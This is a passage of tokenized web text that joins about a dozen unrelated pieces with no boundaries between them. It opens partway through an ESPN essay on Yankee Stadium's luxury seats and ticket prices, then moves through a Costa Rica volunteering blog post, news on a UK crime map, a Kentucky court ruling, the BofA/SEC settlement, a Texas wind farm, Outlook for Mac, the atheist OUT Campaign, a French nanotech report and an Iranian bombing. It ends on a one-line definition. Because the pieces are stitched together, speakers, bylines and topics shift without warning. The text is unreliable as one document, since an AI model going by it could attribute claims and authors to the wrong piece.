It feels good to be reminded , in dramatic , unmistakable ways , that you are better than other people .
It should n't , but it does .
In the downstairs half of the suite , there are all the same food stations -- plus dessert .
Ice cream served in little blue Yankees helmets .
Or maybe an entire pint for your seat .
Pan - sautéed whoopie pies .
I get three or four of those and take them to the bar , where I order a $ 60 glass of Johnnie Walker Blue Label ( food 's free , booze is n't ) .
A house ad airs on the television in front of me .
Apparently , I can buy Kobe beef to take home from the stadium .
Yes , there 's a butcher here .
And an art gallery .
I can get sushi and lobster rolls and Scottish salmon in another nearby lounge , along with duck pasta .
On the first - and third - base side of the room , hidden from common view behind home plate , sit gigantic tables covered with every snack imaginable .
There 's Cracker Jack and peanuts , Twizzlers and Twix , Skittles and Starburst , plus five or six other kinds of sugar - coated goodness .
I watch a kid , maybe 8 years old , stand in front of the spread .
He 's paralyzed .
His dad is trying not to laugh , and the boy can't figure out what to take .
He 's never seen anything like this .
The dad finally laughs .
" It 's all included , " he tells his son .
" It 's like Willy Wonka . "
Welcome to the new America , kid .
Too bad you can't save a bag of Skittles in your wallet for 50 years .
Luckily , you 'll never know what you 're missing .
Julianne Varacchi/ESPN.com and AP Photo
There 's so much to choose from here -- Cracker Jack or candy ?
Kobe beef or sushi ?
' The regular people are in the 400s '
I sip my scotch and wait for the game to begin .
The couple next to me , Ian and Katelyn , are here because he bought her tickets as a birthday present .
She 's a Red Sox fan .
He 's a Yankees fan .
I explain that I normally have to sit in the press box , so this is a nice change .
" Sit with the regular people , " Katelyn says .
Wright Thompson / ESPN.com
Scotch , with a side of ice cream .
She looks around , corrects herself .
" These are n't the regular people , " she says .
" The regular people are in the 400s . "
" Those seats have cushions , too , " Ian says .
He makes a good point .
Much has been said and written about The Moat and how it highlights the divide between the haves and the have - nots .
But that 's not quite right .
There are no have - nots here .
That 's not automatically a bad thing ; a business should sell its product for as much as it can , as long as it's not putting temporary profit over long - term growth .
When a business makes that mistake , longtime pollster Rich Luker calls it harvesting .
Starbucks is struggling , he says , because it harvested .
Wal - Mart is not because it has n't .
" The American sports industry is in harvest mode , " Luker says .
" The industry has lost its regard for human beings . "
A recent poll discovered an unsettling trend emerging for the first time .
American families whose household income is $ 75,000 or less now have zero dollars of discretionary income .
According to Luker , that means about 75 percent of the country can never responsibly afford to go to a live professional sporting event .
Franchises want them to be fans , to buy the gear and pull for their teams and watch the telecasts the leagues are paid billions for .
But they do n't need them to come to their stadiums .
There are , right now , plenty of rich people who love games .
The prices reflect that .
The reason sporting events cost so much now , Luker 's research shows , is because they are designed to be affordable only to those making $ 150,000 or more a year .
This was n't always true .
Ten years ago , it was cheaper to go to a baseball game than to a movie in half of the big league markets ( take away parking at the game , and it was cheaper in every market ) .
Today , there is n't a single city in America where it costs less to go to a major league game than to a movie .
Everywhere we turn , we see examples of the collapsing middle class .
This is where that issue lives in the world of sports , and it has predictable consequences .
" The lower the income , " Luker says , " the less they 're enjoying sports . "
His August poll discovered a third of Americans are less interested in sports because of the declining economy .
That 's bad news , made worse by a problem he first noticed in 2004 and which has continued since :
For the first time , the largest number of sports fans are n't 12 - to 17 - year - old boys .
The baby boomers are the group that shows the greatest increase in a love of sports , and they 'll be dying soon .
Who will replace them ?
By excluding 75 percent of the population from experiencing the best part of spectator sports -- actually holding a ticket in your hand -- franchises have created a potentially fatal problem for themselves .
Luker predicts the future of sports by looking at the decline of soap operas .
Once , there were 30 .
Now , because the audience changed , there are seven .
" We have the first true sustained evidence of less interest in sports than there was 10 years ago , " he says .
" It wo n't happen overnight .
It will take a generation .
But in general , sports will not be what it is today .
We 're burning out the love of sports . "
Too much of a good thing
Me ?
I 'm burning it at both ends .
I grab some free stuff and climb the stairs into Yankee Stadium -- a lovely light .
An usher greets me and walks me to my seat , stopping to speak to regulars on the way .
There are no drunks cursing , no people getting out of hand .
It 's civilized .
I sit down in my $ 1,200 seat for the first time .
" This does n't suck , " I say to the woman next to me .
She and her friends are here for just one game , like me .
" Once in a lifetime , " she says .
I share my Champagne with the people sitting in front of me .
They 're fun guys , and one of them slides me a card .
Show this to a cop if you get pulled over , he says .
He invites me on their annual fishing trip to Canada .
This , I think , is what it 's like to travel in places that grant access only to the rich and powerful .
Just by sitting here , I 'm pre-vetted .
I 'm already in the club .
We make the New York City cop stationed nearby laugh , and he jokingly waves his handcuffs at us .
Police officers are nice to rich people .
Suddenly , I have this bizarre thought : I 'm ruined .
I can't imagine ever sitting in regular seats again .
Even the heavy hitters are opting out
The game is amazing up close .
I 'd never noticed how much the first baseman jokes with the baserunner before .
I can see the players ' faces , feel the speed of the ball off the bat .
I find myself wondering who sat in this seat in the old stadium .
Later , I 'd find out .
Wright Thompson / ESPN.com
Champagne should be shared with neighboring fans .
His name is Louis Gimbel IV , the president of an international hops company , Hopsteiner .
He 's the fourth generation of his family to run it .
The man who founded it , his great - grandfather S.S. Steiner , loved the Yankees , which is why he stuck with the team through the Depression .
Many people could n't go to games anymore .
Attendance fell from 1.1 million in ' 27 to 650,000 in ' 35 .
Through it all , the Yankees refused to lower their prices .
Owner Jacob Ruppert 's reasoning made a certain sense :
He had never raised prices during the boom of the 1920s .
By 1934 , Steiner was one of only two season - ticket holders left .
After the other man -- who invented the safety razor -- died , his heirs let the seats go .
But Steiner passed his down .
Steiner 's son wound up with the seats , and when he was killed during World War II , the family took his son to the 1941 World Series immediately after the funeral to try to get his mind off losing his daddy .
That little boy was Louis Gimbel 's father .
As recently as last year , Gimbel still sat in the same spot .
Now he 's gone .
He finally said no .
Lots of his friends did , too .
The Yankees wanted too much , pushed too hard .
Last year , during a game , a Yankees employee called Gimbel up to a luxury suite and put on the hard sell for the new stadium 's ticket packages .
Gimbel had to sign now , he was told .
Tickets were going fast .
Oh , and his cost would go from $ 225 a ticket to $ 900 a ticket , and he would n't be sitting in the same place .
He could n't believe the tone of the guy .
" I 've been in a lot of tough negotiations with big companies , " Gimbel says , " and I 've never disrespected someone as much as that guy . "
Later , he toured the new stadium .
He has photos on his cell phone of himself in the hard hat .
The salesman pushed again .
He said :
The food 's free , which Gimbel pointed out was n't exactly true .
He said , : You wo n't be bothered by any " riffraff . "
Gimbel could n't believe what he was hearing .
He 's the president of a large New York company , with historical ties to the team and modern ties to huge sponsors of Major League Baseball , and his family members have been premium ticket holders for 85 years .
If they 're treating him like this , how must they be treating someone sitting in the upper deck ?
All of New York was in a financial panic , and he was in a half - built stadium , getting a full - on shakedown for thousand - dollar baseball tickets .
" Do you know what just happened to Bear Stearns ? "
Gimbel asked the guy .
The salesman either did n't know or did n't care .
Gimbel said no .
Not because he did n't have the money but because a bond had been broken .
On Opening Day , Gimbel took photos of his old spot .
He did n't recognize any of the people .
" There were some heavy hitters sitting around us , " he says .
" There are none of them left sitting there . "
Now there 's just us .
Some of us bought the tickets on the Internet .
Some got them for free .
Baseball insiders I spoke with say for the " normal " games , the team is giving seats away so the stands wo n't look so barren on television .
The Yankees decline to comment on anything about the seats .
Looking around , I can tell which people sit here every game .
They try to dress down , but the shiny watches and expensive shoes give it away .
The men have on polos and pullovers from fancy golf and yacht clubs .
The women wear oversize designer sunglasses .
If they purchased their seats before the team slashed prices , they did n't get money back ; they got twice as many tickets .
Maybe we 're all sitting in their unwanted extras .
Noah K. Murray / US Presswire
For a price , fans can get close to the dugout and CC Sabathia and Jeter .
Blowing up a vital lifeline
Before I leave , I look at my empty seat , try to imagine it in black and white , with C.K.G.
Billings in a coat and bowler hat .
He sat right next to the Yankees ' dugout in the 1920s .
Once he was one of the five richest men in the nation .
I read a story about him not long ago .
In 1903 , flush with money , he got the finest ballroom in New York to cover its floors with dirt so he and his friends could dine on horseback .
They drank Champagne from straws connected to saddlebags .
Everything he did was over the top .
His home was literally a castle .
Today , it 's Fort Tryon Park , up on the Hudson , and if you walk through the brush , you can find overgrown ruins .
I tracked down his relatives , now living on Long Island .
" We can't afford the tickets anymore , " a great - grandchild told me .
Rich and powerful people come and go , their houses rise and fall , but the greed that made them never goes away .
There will always be a tycoon who can spend more on an afternoon of meaningless joy than a coal miner makes in a month .
Conspicuous consumption might be in hibernation , but it will awaken .
Wall Street firms will figure out how to entertain lavishly -- one source said he was offered a skybox from J.P Morgan for Game 1 and from Barclays for Game 2 -- and people will burn money in ludicrous ways , be it eating on horseback or tossing midgets .
That 's not what this is about .
The Yankees almost certainly will break financial records this year , though their attendance is down 13 percent , a warning sign amid the ringing cash registers .
And problems from the past already are working their way into the future : potential ALCS tickets behind the Yankees ' dugout are going on StubHub for about $ 10,000 ; selling a few games can , once again , give a fan an entire season of baseball for free .
There are still people with both money and the desire to pay whatever it costs .
But what if Luker is right and the connection between sports and fans has been broken ?
How many people did the Legends Suite experiment make finally let go of whatever nostalgia kept them close to the Yankees ?
I think of all the people who will never go inside the stadium as kids -- 75 percent of families can never afford to attend a live pro sporting event -- and wonder how many of them might grow up to become wealthy and totally uninterested in baseball tickets .
Think about it .
If you were born before 1984 , when you were a first - grader , the best seat in Yankee Stadium cost less than $ 12 .
You and your dad could sit by the field for $ 25 .
People pay fortunes chasing that feeling .
What about the kids in first grade now ?
I look at my empty seat , try to imagine the people who sat there in the old stadium .
Gimbel still likes the Yankees , but something 's different .
At some point , business intrudes on people 's love for sports .
When a ticket is n't just a piece of paper granting admission but rather a commodity , we feel differently about it .
For many , that happened years ago .
For some , like Gimbel , it happened with the invention of the Legends Suite .
His family made it through the Great Depression but not the tripling of ticket prices in a bad economy .
Everybody has a threshold .
I stand outside the stadium before returning to the black limo .
I 'm already making plans for the evening .
I 'm not a fan , just someone with the ability to buy that ticket .
All the things I ate and drank gave me physical pleasure , but there 's no emotional afterglow .
Something important was lost in the transfer of money for services .
The game happened .
I loved it .
Now it 's over .
People file out of every exit , disappearing into the night .
They walk to subway stations , to cabs , to parked cars .
Some of us wo n't ever come back .
Julianne Varacchi/ESPN.com
Will fans continue to pay the high price of admission here , and at other parks ?
Join the conversation about " Seats Of Gold . "
Wright Thompson is a senior writer for ESPN.com and ESPN The Magazine .
He can be reached at wrightespn@gmail.com .
Like most graduates , I followed the drumline into a full - time office position .
Within the first few weeks , I knew it was n’t what I wanted .
What I needed was to expand my horizons , literally .
I found that through volunteering abroad .
There ’s nothing more than a replica of cubicles to convince you that you are in fact , claustrophobic , and if you do n’t escape this maze immediately , you ’re doomed to die a long , slow death .
Maybe that ’s a bit much , but that ’s how I began to feel .
Volunteering Abroad : A new perspective awaits
I began taking my vacation time to travel solo , but it was n’t until I took a two - week backpacking trip through Mexico when I realized I needed to stop dreaming and start doing .
Upon my return , I enrolled for a TEFL course in Costa Rica , which would certify me as a qualified ESL instructor .
Teach English Overseas
Teaching English would help me to continue developing myself professionally while abroad , yet give me the freedom I needed to explore new countries , cities , and people , in addition to funding those travels .
However , that plan was slightly altered .
After completing my 4 - week course , I was offered the opportunity to volunteer teaching English through the same company .
They worked in local communities around Costa Rica , and were short on volunteers for one project .
In exchange , they offered three meals per day , and a room in a shared house with other volunteers .
I figured it would , at the least , be a new adventure , but I never expected it to be a life altering experience .
What Volunteering Abroad Included
The house the volunteers were afforded was a basic living arrangement .
Everyone had their own room containing a twin - size bed , a small desk , and shelf space .
We shared a small kitchen with a 4 - person breakfast able , a living room with a sofa , and a small tv that was hardly on due to a lack of cable .
Our cleaning woman / cook was named Ana , and she prepared all our meals 6 days per week .
Sundays , we were left to cook our own meals , often taking turns between household members .
Though our house was perfectly acceptable , the neighborhood in which we lived and volunteered was obviously in need .
Kids ran around the streets without shoes , but with the happiest smiling faces .
When it rained , lots of families caught drops into their homes with buckets as the tin , corrugated rooftops would slant the water inwards .
Families were n’t hassled by these unfortunate circumstances .
Instead they took it up as a necessary chore , and thoughtlessly switched the buckets when needed .
When drug trades were conducted on the streets , everyone stayed indoors and watched from the windows to ensure when it might be safe to head out again .
This was a daily routine .
Volunteering Abroad – The Workweek
Monday started the workweek .
I followed the other volunteers as we balanced on cracked pavement , hopped over tiny muddled streams in the middle of the street , and crossed trash littered lawns kept by stray dogs .
Every morning was a heart wrenching scene until we walked into the classrooms .
We turned down a non -descript dirt road surrounded by dwellings on either side .
Every morning , Rosa could be seen taking the clothes she hung to dry overnight off the clothing line .
She smiled her toothless grin , and nodded towards us in acknowledgement as we waved back .
The School
The classes were held in a community center run by a local resident .
Really , it was a living dwelling for six families , but the owner opened her home to the residents interested in taking free English classes .
My class was situated in what I imagined to be the dining room .
To the right lay two - steps , like a small stoop , leading to the kitchen .
To the left was an open door leading to what looked like an ally –this is where the kids would play during recess .
My roommate , and fellow volunteer , James , introduced me to my students for the next four weeks .
Why English is Important
I was scheduled to work with students aged 16 - 24 who were considered intermediate - English speakers .
I worked with the same eight students from 9 am - 12 pm and everyday each student showed up to class on time and prepared , even after long nights of school or work the night before .
They were serious about their studies , and determined to speak English properly .
I was curious to learn why .
“ Teacher , here is our neighborhood .
We need to make more money to move to a better neighborhood like in San Pedro , and maybe go to school there ” , said Josue .
“ If we know English , we will get better jobs maybe in tourism and we can speak properly to people like you ” .
I nodded my head to show I understood .
We began our first vocabulary lesson , “ If you could travel anywhere in the world , where would you go ? ”
I strategically asked these sorts of questions at the beginning of my lessons .
One by one , everyone sitting around the dining table answered .
This helped me to get to know my students .
I learned about their dreams , their likes , dislikes , hobbies , and favorite places .
Every question I asked was thrown right back at me .
They wanted to know about me , where I was from , and what it was like .
Filled with Gratitude
I immediately realized the privilege I had to be able to visit all their favorite places , while knowing they may never be able to visit mine .
In that moment , I was overwhelmed with a feeling of gratitude .
They studied hard , practiced harder , and grasped the concepts I threw at them .
They were learning and advancing their English language skills , and that was obvious .
What was n’t so obvious was how much I was learning from them in return .
Volunteering Abroad taught me so much
They taught me that although they were n’t living in ideal circumstances , they were n’t deprived of anything they needed to succeed .
When the government failed to provide funding to their underdeveloped neighborhood , they came together as a community in an attempt to finance themselves .
When the younger children lacked enough toys to play with , they made up new games everyone could join in on , even if that game was only “ surfeando la lluvia ” , rain surfing .
One Month Volunteering Abroad Changed My Life
In a month ’s time , I learned more about family , community , and love than I had learned in a lifetime .
It became clear that money can sometimes get in the way of what ’s really important , and that without it , you learn to trust , your creativity spikes , and your determination soars .
For four - weeks I was the only resource these students had to learning English , and because of that limitation , they were pressed to learn as much as possible from me ; they never missed a day and they were n’t afraid to ask for clarification when they needed it .
At the end of our time together , my heart ached as I hugged each student and thanked them for allowing me into their lives .
I could ’ve given thousands of English lessons before that point , and still , there would be no words , in any language , for how grateful I am for the way they touched my soul , spoke to my heart , and opened my eyes .
Author Bio :
Shelly hails from New York City but relocated to Costa Rica in January 2017 .
After completing a TEFL course in hopes of finding a job to help fund her life abroad her plans changed an instead of getting a job teaching English , she volunteered in a local community which provided room & board , and 3 meals per day .
The project added so much perspective to life in Costa Rica , and inspired her to grow as a blogger / freelance writer .
Follow Her on Twitter , Facebook , Instagram and at her blog T Shells Adventures of a Dreamer
Read More :
How Volunteering Namibia Led to a Life in Africa
Nicaragua a First Time Volunteer ’s Experience
Visit an Elephant Sanctuary in Chiang Mai
How to Make Your Travel Meaningful
The launch of an interactive online map showing crime statistics for every street in England and Wales sparked such interest yesterday that it crashed just hours after its launch .
Interestingly enough users in London , Yorkshire , Humberside and Manchester were unable to access the site – which makes sense given that they are among the ten worst crime spots in the country .
Download the new Independent Premium app Sharing the full story , not just the headlines
To give you a hand in case the National Policing Improvement Agency ’s site gets overloaded again we ’ve compiled a list ( by police force ) of the ten worst areas statistically for crime in England and Wales .
London came out top ( surprise surprise ! ) with Manchester next and Yorkshire and the north east faring pretty badly too .
Sussex featured much higher on the list than it would have done last year following a staggering 29 per cent rise in crime overall .
But in general the police stats suggest that crime rates are going down .
Click here or on the image above see view the ten biggest crime spots
LOUISVILLE , KY , September 2 , 2009 ( LifeSiteNews.com ) - The U.S. Court of Appeals for the 6th Circuit ruled Monday that a Baptist children 's home , Sunrise Children 's Services , did not violate state or federal laws when it dismissed an employee who was engaged in homosexual conduct .
The court ruled that the home did not violate Title VII , the federal employment discrimination law , or the Kentucky Civil Rights Act .
The American Civil Liberties Union ( ACLU ) brought the lawsuit against the home , which provides social services for at - risk children .
The Alliance Defense Fund provided funding for attorneys with the Christian Legal Society and Thomas More Law Center to defend the home in the suit .
" Faith - based organizations should not be discriminated against for their beliefs .
This is an important victory for the ability of faith - based social service providers to hire employees who share their values , " said Greg Baylor , attorney for the Christian Legal Society Center for Law & Religious Freedom .
In its ruling , the 6th Circuit also dismissed the ACLU 's claim that the home should not receive partial expense reimbursements from the federal government for its needy youth programs because of the home 's religious affiliation .
The court , however , allowed the claim that partial expense reimbursements from the state government might violate the Establishment Clause of the First Amendment to proceed , which the home intends to appeal .
" The reimbursement Sunrise receives has been used to serve abused and neglected children , " Baylor explained .
" We are confident that the ultimate outcome of this case will be that the home will continue to help at - risk youth as it has been doing for years . "
The suit began when the children 's home , formerly known as Kentucky Baptist Homes for Children , dismissed Alicia Pedreira , an employee who was involved in homosexual behavior .
The Kentucky ACLU attempted to characterize Pedreira 's dismissal as religious discrimination and challenged the state and federal reimbursement the home receives , claiming its religious affiliation made the reimbursement a violation of the Establishment Clause .
Ranking the rescues View photos
The collapse of Lehman led to a deeper recession and a litany of government programs to try to end the pain .
We rate just how bold and effective the plans have been so far .
When Wall Street nearly collapsed View photos Would panic prevail ?
That was the question gripping the world in the days surrounding the fall of Lehman Brothers on Sept. 15 , 2008 .
One year after that terrifying Monday , the people who struggled to cope with the financial crisis share what they were thinking as chaos broke out .
NEW YORK ( CNNMoney.com ) --
A federal judge struck down a proposed settlement reached between Bank of America and federal regulators over outsized bonuses paid to Merrill Lynch employee .
In a ruling issued Monday , U.S. District Court Judge Jed Rakoff called the proposed $ 33 million penalty between the Securities and Exchange Commission and the Charlotte , N.C. - based bank " neither fair , nor reasonable , nor adequate . "
Both parties , as a result , were ordered to head to trial , starting Feb. 1 , 2010 .
In a statement issued Monday , the SEC maintained its belief that the proposed settlement was " properly balanced " but that it would carefully review the judge 's ruling .
Bank of America was not immediately available for comment .
" As we said in our court filings , we believe the proposed settlement properly balanced all of the relevant considerations .
We will carefully review the Court 's most recent order , " said John Nester , SEC spokesman .
The pair had struck a settlement agreement in early August after the SEC brought charges against Bank of America ( BAC , Fortune 500 ) for allegedly misleading investors about billions of dollars in bonuses paid to Merrill Lynch employees .
Regulators had claimed that BofA effectively lied in its proxy statement , saying it would not pay out bonuses to Merrill employees in fiscal year 2008 , when , in fact , the bank authorized bonus payments of as much as $ 5.8 billion .
Of that allowance , $ 3.6 billion was paid out in 2008 to more than 39,000 Merrill employees .
An easy resolution to the matter seemed to fade in the following weeks however , as Rakoff pushed the pair for additional details on the terms of the agreement .
He demanded to know , among other things , why the SEC did not pursue charges against BofA executives , and why the company agreed to settle if the firm felt it was innocent .
While not admitting any guilt , Bank of America has maintained it decided to settle with the SEC because it did not want to be distracted by a lengthy court battle with one of its main regulators at a time of market uncertainty .
Both parties tried to address some of those very questions last week , urging the judge for a second time to uphold the settlement .
Those pleas failed , however , as Rakoff showed little mercy towards either party in Monday 's filing .
He called the settlement a " contrivance " designed to make it appear as if the SEC , which has been plagued by enforcement scandals over the past year , was doing its job .
Rakoff also blasted both parties for asking BofA shareholders to shoulder the cost of a settlement he labeled as " trivial . "
" All this is done at the expense , not only of shareholders , but also of the truth , " he wrote .
This is not the first time Rakoff has rejected a settlement struck between corporate offenders and regulators .
In 2003 , he refused to uphold a $ 500 million settlement between the SEC and bankrupt telecom giant WorldCom .
After the parties were forced to renegotiate the settlement , Rakoff later signed off on a $ 750 million fine .
In that ruling , he also demanded that stock in MCI , the new company that WorldCom emerged from bankruptcy as , be set aside for former WorldCom investors .
U.S. Renewable Energy Group
A consortium of Chinese and American companies announced a joint venture Thursday to construct a massive 600 - megawatt wind farm in West Texas , using wind turbines manufactured in China .
Construction of the $ 1.5 billion wind farm would be funded largely by Chinese financiers , with an assist from the United States government in the form of loan guarantees and grants from the federal stimulus package .
“ This wind farm project came about thanks to the openness of the United States for investments in the field of renewable energy , ” said John Lin , the chief operating officer of Shenyang Power Group , an industrial group in China focused on renewable energy projects .
The project would mark the first instance of a Chinese manufacturer exporting wind turbines to the United States market , according to the vice mayor of the city of Shenyang , Yang Yazhou , who spoke at a news conference announcing the joint venture .
The farm is to be built on 36,000 acres in western Texas — an exact location was not specified — and will use 240 2.5 - megawatt turbines manufactured in China .
Construction is expected to begin next March .
The project will create an estimated 300 temporary construction jobs , and 30 permanent jobs .
Partners in the project are the U.S. Renewable Energy Group , an investment firm ; A - Power Energy Generation Systems , a Chinese wind turbine manufacturer ; and an Austin - based wind developer , Cielo Wind Power .
The use of Chinese turbines in a major American wind project could add fuel to concerns over China ’s protectionist policies in renewable energy manufacturing .
China is already a dominant player in solar panel manufacturing , and exports 95 percent of its solar components to the United States and Europe .
According to a recent article in The New York Times by Keith Bradsher , China required 80 percent of the materials used to construct its first solar power plant earlier this year come from China .
Foreign manufacturers of wind turbines have struggled to gain entry into the Chinese market , Mr. Bradsher reported .
The United States energy secretary , Steven Chu , recently warned that the United States could lose its competitive edge on renewable energy manufacturing to China , which has instituted ambitious renewable energy mandates in order to reduce carbon emissions and limit pollution .
American pressure on China over the issue of protectionism appears to have had some impact .
At a meeting on Thursday in Hangzhou with the Chinese vice premier , Wang Qishan , Mr. Chu announced that China had agreed to remove local content requirements on wind turbines , which have drawn complaints from European and American manufacturers .
The turbines for the Texas wind farm , although slated for construction in China , will use technology from the United States and Europe , including a turbine designed by German wind power manufacturer Fuhrlander and gear box design by General Electric .
I grew up in a college town , and one Halloween our doorbell rang and we opened the door expecting to see trickortreater — but what was in front of our open door — was another door !
Like , a full - on wooden door , that had a sign that said “ Please knock . ”
So we did , and the door swung open to reveal a bunch of college dudes dressed as really old grandmothers , curlers in their hair , etc , who proceeded to coo over our “ costumes ” and tell us we were “ such cute trick or treaters ! ”
One even pinched my cheek .
Then THEY gave US candy , closed their door , picked it up and walked to the next house .
Microsoft has announced some big news concerning the next major revision of Office for Mac : it is currently on track to ship late next year , and it will replace the much - maligned Entourage with a bona fide version of Outlook for Mac .
In the meantime , Microsoft 's Mac Business Unit has a final version of Entourage Web Services Edition ready for those who need better Exchange support now , and they will be packaging it in a new " Business Edition " of Office for Mac 2008 starting next month .
Seriously , it 's Outlook .
For real .
You read the news right : Microsoft is finally making a real , actual , official , true , and correct version of Outlook for Mac OS X .
This new application , which Mac BU general manager Eric Wilfrid told us he has been using for nearly a year , is built from the ground up to fully support Exchange 's latest protocols .
Written in Cocoa to take advantage of the latest OS X technologies , Outlook for Mac will also have a completely redesigned database that will be compatible with Spotlight and Time Machine .
" Because it 's designed for the Mac , it will be different from Outlook for Windows , " Wilfrid said .
" But it will be fully compatible .
For instance , Outlook for Mac will support Information Rights Management , which controls access to sensitive documents . "
As a sort of stepping stone towards a full Outlook client for Mac OS X , the Mac BU has released Entourage Web Services Edition .
This version of Entourage is architected to connect to Exchange 2007 , and it provides much faster data synchronization and improved e-mail and calendar support .
Users of Office 2008 with SP2 applied can download Entourage Web Services Edition today , but bear in mind it requires Exchange 2007 SP1 RU4 or later .
It 's definitely worth checking with your IT department to see if your company 's Exchange server is compatible .
Finally , the Mac BU is rejiggering the versions of Office 2008 it is making available to consumers .
The " Student and Home Edition " will stay the same , but a new " Business Edition " arrives on September 15 .
Packaged in a Serious Business Black box , this new edition will include Entourage Web Services Edition and Document Connection for Sharepoint compatibility , and it will sell for the same $ 399 as the " Standard Edition " did .
Also included with the Business Edition are over 200 professionally designed , business - oriented templates and clip art , as well as seven hours worth of training at lynda.com .
According to Wilfrid , a recent survey showed that 90 percent of Office for Mac 2008 users would recommend the package to colleagues and friends — despite the fact that the loss of Visual Basic and a lack of complete Exchange support relegated Office for Mac 2008 to also - ran status in many business environments .
But with Visual Basic set to return next year and the news of a full Outlook client coming to the suite , the Mac BU hopes to suggest that Office for Mac is serious business .
Despite my initial reaction , I soon decided that the pros of something like the OUT Campaign far outweighed the cons .
The last thing I wanted to be was one of those atheists who are always putting down the efforts of others to improve our plight without bringing better ideas to the table .
Something like the OUT Campaign was clearly needed , and I recognized that now was the time for such an effort .
After Dawkins clarified the intended purpose of the campaign , I decided that it was something I could support .
That said , I still rejected the scarlet A symbol at this point .
Roughly a month after decided I could support the OUT Campaign , I was still complaining about the unfortunate choice of the scarlet A as the chosen symbol .
I still feel this way but to a much lesser degree .
While it would not be my choice of a symbol , it has caught on to some degree .
When I and many other atheists see it , we know what it signifies .
Really , that is all it was ever supposed to do .
I can live with it .
Fast forward to the present day .
I 've learned to accept the scarlet A , and I continue to support the OUT Campaign ( although I do so with the caveat that nobody should be blindly encouraged to " come out " without first assessing the potential risks to their personal safety for doing so ) .
That said , I continue to have one substantive complaint with the OUT Campaign : it continues to be much too closely linked to Richard Dawkins , and I think that this is a recipe for disaster .
Let me explain why .
A l'approche du débat public national autour du développement et de la régulation des nanotechnologies , qui se déroulera du 15 octobre au 24 février , il nous a semblé intéressant de se pencher sur les produits qui , d'ores et déjà , incorporent des nanomatériaux , ou sont fabriqués au moyen de nanotechnologies .
Equipements sportifs , peintures , emballages , textiles … la base de données du Project on Emerging Nanotechnologies ( PEN ) , une fondation américaine qui veut œuvrer à plus de transparence en matière de nanotechnologies , a franchi cet été le cap des mille produits vendus dans le commerce , soit une augmentation de 379 % depuis sa création en 2006 ( voir le bilan que nous dressions à l'époque : 212 ( nano ) produits de consommation ) .
On y trouve 155 vêtements , 137 produits cosmétiques et 33 crèmes solaires , des shampoings , dentifrices , traitements capillaires , anti-douleurs ou contre l’acné … : 60 % d’entre eux relèvent des domaines de la santé et du bien - être .
Viennent ensuite les produits de ménage et d’entretien , ou pour le jardin : peintures , nettoyants , purificateurs d’air , dégraissants , anti-odeurs , oreillers et autres produits antibactériens , sacs à main et bagages imperméabilisés …
Les produits alimentaires arrivent en troisième position , avec un complément " bionique " ( et aromatisé au café ) , un autre pour maigrir ou vivre plus longtemps , de la vitamine en spray , du chocolat light , ou encore cette " eau maternelle " , filtrée au moyen de nanoparticules d'argent " sans traitements chimiques " et tout spécialement créée pour les mamans et leurs nouveaux - nés .
On y dénombre également 68 produits et accessoires utilisés dans le secteur automobile , essentiellement des revêtements extérieurs , destinés à lutter contre les effets de l'humidité , de l'érosion , ou des marques pouvant abîmer les carrosseries .
En cinquième position , les produits électroniques sont également assez bien représentés , et constituent une bonne partie du chiffre d'affaires des " nanos " , avec la mémoire de l'iPod et la batterie de l'iPhone , toutes deux fabriquées par Samsung , les processeurs Intel Core 2 Duo , la puce IBM de la Xbox 360 , les écrans OLED , et même un téléphone mobile antibactérien …
Au rayon enfants , on trouve une tétine , un biberon , une brosse à dents , et même des nounours antibactériens .
Nos amis les animaux ne sont pas en reste ; ils peuvent en effet se voir offrir un lit intelligent , imperméable , antibactérien et à la pointe de la technologie puisqu'il reste " naturellement propre " et sans odeur , un shampoing désodorisant , un spray pour restaurer le pH neutre de leur peau , ou encore un collier antiaboiement qui envoie une " correction " électrique à chaque fois que votre chien aboie …
En 2007 , le marché des produits incorporant des nanomatériaux était estimé à 147 milliards de dollars , et pourrait , d'après le PEN , atteindre les 3 100 milliards en 2012 .
Si le marché est , pour l'instant , dominé par l'industrie chimique , cette dernière pourrait d'ici là être supplantée par les industries pharmaceutiques et cosmétiques .
540 de ces produits viennent des USA , 240 de l'Asie du Sud-Est , et 154 d'Europe , dont 17 de France ( deux raquettes de tennis , quinze parfums et produits cosmétiques ) .
Le PEN a également publié , en juin 2009 , une carte des 1200 entreprises , universités et laboratoires qui , aux Etats - Unis , travaillent au développement et à la commercialisation des nanotechnologies .
Malheureusement , note le bureau européen de l'environnement ( EEB , qui se présente comme " la voix environnementale des Européens " , et qui fédère plus de 140 ONG dans 31 pays ) dans un rapport consacré à l'impact sanitaire et environnemental des nanomatériaux , on ne dispose pas , en Europe , d'information claire sur ce qui est produit ou testé par qui , où , ni en quelle quantité .
Jean - Marc Manach
The Revolutionary Guards killed in the attack were buried on Sunday
Revolutionary Guards members killed in Sunday 's suicide bombing in south - eastern Iran have been buried .
Thousands of mourners , many in military uniforms , attended the funerals .
The attack in the province of Sistan - Baluchistan killed 42 people .
It targeted the Revolutionary Guard , killing 15 of its members .
Iran has blamed Jundullah , a Sunni militant group .
It has also accused the United States , Britain and Pakistan of some role in the attack .
All have denied any involvement .
Sunday 's suicide bombing hit as Revolutionary Guards met tribal leaders in the Pishin district close to the Pakistani border .
SISTAN - BALUCHISTAN ATTACKS
May 2009
A bomb explodes at a mosque in the provincial capital Zahedan , killing 19 and injuring 60 .
February 2007 Suspected militants killed 11 , including Iranian Revolutionary Guards , in a bomb attack in the provincial capital Zahedan .
March 2006
Gunmen posing as police kill 22 people , many government employees , after closing the Zabol - Zahedan road .
Profile : Iran 's Jundullah militants Profile : Iran 's Revolutionary Guards
The deputy commander of the Guards ' ground force , General Noor Ali Shooshtari , and the Guards ' chief provincial commander , Rajab Ali Mohammadzadeh , were among the dead .
Dozens of people were injured .
" The martyrdom of commander Shooshtari added a black page to the US and Israeli terrorist file , " armed forces chief Maj Gen Hassan Firouzabadi said in a message read out at the ceremony , the official IRNA news agency reported .
' US action '
Iranian authorities summoned a senior Pakistani diplomat in Tehran , claiming that the assailants had arrived in Iran from Pakistan .
Parliament Speaker Ali Larijani has also said " US action " contributed to the attack .
Sistan - Baluchistan is mainly made up of the Baluchi ethnic group , who belong to the Sunni Muslim minority of Shia- ruled Iran .
Jundallah has previously been accused by Iran of terrorist activities in the province .
The region borders both Pakistan and Afghanistan , and has long been affected by smuggling , drug - trafficking , banditry and kidnapping .
Jundallah , also known as the Popular Resistance Movement of Iran , says it is fighting against the political and religious oppression of the country 's minority Sunni Muslims .
Cleavage is the cleft created by the partial exposure of a woman 's breasts , especially when exposed by low - cut clothing .
